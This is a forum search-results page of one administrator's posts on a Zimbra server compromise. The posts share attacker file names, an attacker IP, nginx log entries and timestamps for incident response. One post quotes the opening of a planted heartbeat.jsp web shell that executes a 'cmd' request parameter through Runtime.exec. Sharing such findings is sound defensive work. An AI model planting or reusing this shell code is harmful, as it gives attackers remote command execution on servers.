Search found 50 matches

by thomas.klaube
Thu Apr 06, 2023 8:38 am
Forum: Administrators
Topic: [SOLVED] The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....
Replies: 42
Views: 84751

Re: The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....

Hi all, we support dozens Zimbra installations, most of them single server, some multi-server. 2 (that is "two") are running Zimbra 9.0, all others are on 8.8.15. The reason was already pointed out by Klug - our users are just not interested in the "modern UI" as it lacks soooo m...
by thomas.klaube
Tue Apr 04, 2023 4:40 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hi Chris,

thanx a lot for your feedback! I have updated the information in our Zimbra call. I pointed out that there is probably a risk for servers running P37 and p38. I have escalated this issue as much as I could.

Do you have - by any chance - serverlogs from Feb 12th?

Thanx and regards
Thomas
by thomas.klaube
Tue Apr 04, 2023 2:54 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

I am going to throw some stuff out there on the only server I have that isn't 0-trust. I have nginx logs back for 5 months on this server. % check_attacks.pl -logDir=`pwd` --search heartbeat [ 404] GET https://X.X.X.X/public/heartbeat.jsp Fuzz Faster U Fool v1.5.0 The above all happened on March 24...
by thomas.klaube
Tue Apr 04, 2023 2:31 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hello Thomas, The timestamp for heartbeat.jsp was 12th Feb. I have restored my mail server from a snapshot taken 16th Jan. I can confirm that heartbeat.jsp was not present and that the web interface works again. The version of Zimbra I have restored is Release 8.8.15_GA_3953.RHEL8_64_20200629025823...
by thomas.klaube
Tue Apr 04, 2023 12:51 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

My Zimbra is Release 8.8.15_GA_3953.RHEL8_64_20200629025823 UNKNOWN_64 FOSS edition, Patch 8.8.15_P38, running on fully patched AlmaLinux 8.7. The only ports allowed from the Internet are SMTP and HTTP/S. Pax is installed ([zimbra@mail ~]$ pax --version gives "spax: star 1.5.3 (x86_64-unknown-...
by thomas.klaube
Tue Apr 04, 2023 8:55 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

For the infected users, is it possible your exploit is related to the issue discussed here: https://forums.zimbra.org/viewtopic.php?t=71693 ? Not in my case. The server did'nt have clamav installed. Posts to the forums describing unpatched exploits will not be approved. Hope that helps, Mark What d...
by thomas.klaube
Mon Apr 03, 2023 11:52 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Contents of the heartbeat.jsp file: <%@ page import="java.util.*,java.io.*"%><%%><%if (request.getParameter("cmd") != null) {Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C ...
by thomas.klaube
Mon Apr 03, 2023 11:35 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

The attacker's files are: - heartbeat.jsp - info.jsp - style.css In my case, the IP address of the attacker was 185.246.188.67 (it is on the abuse list) Do you know the timestamps of the files? On my server the heartbeat.jsp had a timestamp of Feb 12th. So the files was placed there some time ago. ...
by thomas.klaube
Mon Apr 03, 2023 9:21 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hi all, I found this in nginx.log. 185.246.188.73:45592 - - [31/Mar/2023:18:47:46 +0200] "POST https://192.168.0.1/public/heartbeat.jsp HTTP/1.1" 200 406 "-" "python-requests/2.25.1" the heartbeat.jsp was placed in /opt/zimbra/jetty/webapps/zimbra/public previousely - b...
by thomas.klaube
Mon Apr 03, 2023 8:29 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hi all,

I opened a Zimbra case. Case No. is 01475766.

I suspect a zero day exploit - actively being exploited... I can only guess how many Zimbra servers out there are at severe risk...

Regards
Thomas